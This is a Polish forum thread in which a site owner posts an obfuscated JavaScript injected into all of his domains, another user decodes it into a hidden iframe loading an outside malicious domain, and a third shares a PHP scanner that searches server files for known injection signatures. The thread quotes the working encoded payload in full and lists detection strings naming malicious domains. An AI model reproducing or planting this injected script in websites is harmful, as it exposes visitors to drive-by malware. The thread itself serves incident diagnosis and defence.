Wirus na stronie

[ognos]

Na jednym z moich serwerow na wszystkich domenach zostal wrzucony taki kod:

<script language=JavaScript>function wvinbn51(b){ var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,33,20,19,13,47,7,32,49,15,0,0,0,0,0,0,52,60,55,4,40,5,17,18,12,23,53,45,4
4,34,62,48,22,35,36,24,28,3,56,42,50,1,31,0,0,0,0,14,0,61,43,30,29,25,51,6,8,46,5
7,41,10,0,37,16,59,26,39,58,27,2,38,9,54,11,21);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(132^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}wvinbn51('fBis75NAWc9AnUZABrpDm5is19s575Nj8rcVWU5WftZpO6_bQMtpMtZjk6_kWIcs1rpjf_bKv3sa
xZcivX_AO355biq5B5_s75iWKbiVb5lAbipD5vTjOfiWx5cAWU_bwI_ALbWanb_Vbr_bKsWK8lpKXxsbQ
cNLfqbjQNsDvGsAKU_ALrpKf_ykL6cpQf_Ajly5Rc9AaQcVjqlVKZ9aDIc0NWNsW6iksMpWKyianrcVs_
qb')</script><!-- 78.46.86.167 -->

mam do was prosbe o rozszyfrowanie go.

[k0rnik]

eval(p) zamień na alert(p) i dostaniesz odpowiedź:

window.status='Done';document.write('<iframe name=c772b src="https://9soldo.info/t/?'+Math.round(Math.random()*25636)+'c772b'+'" width=377 height=68 style="display:none"></iframe>')

[Trotyl]

https://developer.mozilla.org/pl/Dokumentac...iekty/Math/ceil

https://developer.mozilla.org/pl/Dokumentac...biekty/Math/min

https://developer.mozilla.org/pl/Dokumentac...ring/charCodeAt

https://developer.mozilla.org/pl/Dokumentac...ng/fromCharCode

https://developer.mozilla.org/index.php?tit....5/Funkcje/eval

Czyli z podanych liczb generuje sobie jakiś ciąg znaków i go uruchamia. Nie chce mi się sprawdzać co

!!!

[shad]

Tez miałem mały włam (szedł z dialapa od ruskich) tutaj kawałek kodu co skanuje wszystkie pliki na serwerze i szuka tego typu śmieci.

<?php

$start_dir='../';
session_start();

if (!is_numeric($dir_idx)){
	if (isset($_SESSION['dir_idx'])){
		$dir_idx=$_SESSION['dir_idx'];
	} else {
		$dir_idx=0;
	};
};
$_SESSION['dir_idx']=$dir_idx;

if (!isset($dir_array)){
	if (isset($_SESSION['dir_array'])){
		$dir_array=$_SESSION['dir_array'];
	} else {
		$d=@dir($start_dir);
		if (is_object($d)){
			$dir_array=array();
			while($name=$d->read()) {
				$dir_array[]=$name;
			}
			$d->close();
			sort($dir_array);
	};
	};
};

$_SESSION['dir_array']=$dir_array;

$dir_name=$start_dir.$dir_array[$dir_idx].'/';

_fix($dir_name);


#----------------------------------------------------
#
#----------------------------------------------------
function _fix($dir_name,$poxiom=0,$max_poziom=3){

$file_ext='.html';
$file_ext2='.htm';
$file_ext3='.css';
$file_ext4='.js';
$file_ext5='.php';
$file_ext6='.inc';
$file_ext7='.tpl';
$file_ext8='.txt';
$file_ext9='.htx';

$test1a='JavaScript';
$test1b='d=Array(';
$test1c='eval(h)';

$test2a='<iframe src=';
$test2b='width=1';
$test2c='height=1';
$test2d='visibility: hidden';

$test3a="document.write('<iframe ";
$test3b='name="webresource_1"';
$test3c='control.php';

$test4a="document.write('<iframe";
$test4b='7speed.info"';
$test4c='display:none';

$test5a="<iframe name=";
$test5b='analystic.org';
$test5c='display:none';

$test6a="frameset rows";
$test6b='analystic.org';
$test6c='</frameset>';

$test7a="(z)";
$test7b='63,9,3,44';
$test7c='eval';

$test8a="get_counter()";
$test8b='google-stats';
$test8c='tds_u.php';

echo "Start: $dir_name<br>";	
$d=@dir($dir_name);
if (is_object($d)){
while($name=$d->read()){
if ($name!='.' AND $name!='..' AND $name!=''){
	$curr=$dir_name.$name;
	if (is_file($curr) AND (
		stripos($name,$file_ext)!==false OR stripos($name,$file_ext2)!==false OR stripos($name,$file_ext3)!==false OR stripos($name,$file_ext4)!==false
		OR stripos($name,$file_ext5)!==false OR stripos($name,$file_ext6)!==false OR stripos($name,$file_ext7)!==false OR stripos($name,$file_ext8)!==false OR stripos($name,$file_ext9)!==false)
	){
			#echo ("read: $curr<br>");
			$index=file_get_contents($curr);
			if (stripos($index,$test1a)!==false AND stripos($index,$test1b)!==false AND stripos($index,$test1c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - eval : $curr</h3>";
				} else
			if (stripos($index,$test2a)!==false AND stripos($index,$test2b)!==false AND stripos($index,$test2c)!==false AND stripos($index,$test_2d)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - iframe : $curr</h3>";
				} else
			if (stripos($index,$test3a)!==false AND stripos($index,$test3b)!==false AND stripos($index,$test3c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - control.php : $curr</h3>";
				} else 
			if (stripos($index,$test4a)!==false AND stripos($index,$test4b)!==false AND stripos($index,$test4c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - 7speed.info : $curr</h3>";
				} else 
			if (stripos($index,$test5a)!==false AND stripos($index,$test5b)!==false AND stripos($index,$test5c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - analystic.org - iframe: $curr</h3>";
				} else 
			if (stripos($index,$test6a)!==false AND stripos($index,$test6b)!==false AND stripos($index,$test6c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - analystic.org - frameset : $curr</h3>";
				} else 
			if (stripos($index,$test7a)!==false AND stripos($index,$test7b)!==false AND stripos($index,$test7c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - eval - frameset : $curr</h3>";
				}
			if (stripos($index,$test8a)!==false AND stripos($index,$test8b)!==false AND stripos($index,$test8c)!==false){
					echo "<h3 style='color:#FF0000'>Find Virus ? - google-stats : $curr</h3>";
				}

		} elseif (is_dir($curr)){
			$poxiom++;
			_fix($curr.'/',$poxiom,$max_poziom);
		}
}
}
$d->close();
};
}

session_write_close();
?>

[AdamAGP#]

wystarczy wrzucić i uruchomić z poziomu przeglądarki?

[zoozool]

albo konsoli

php nazwa-skryptu.php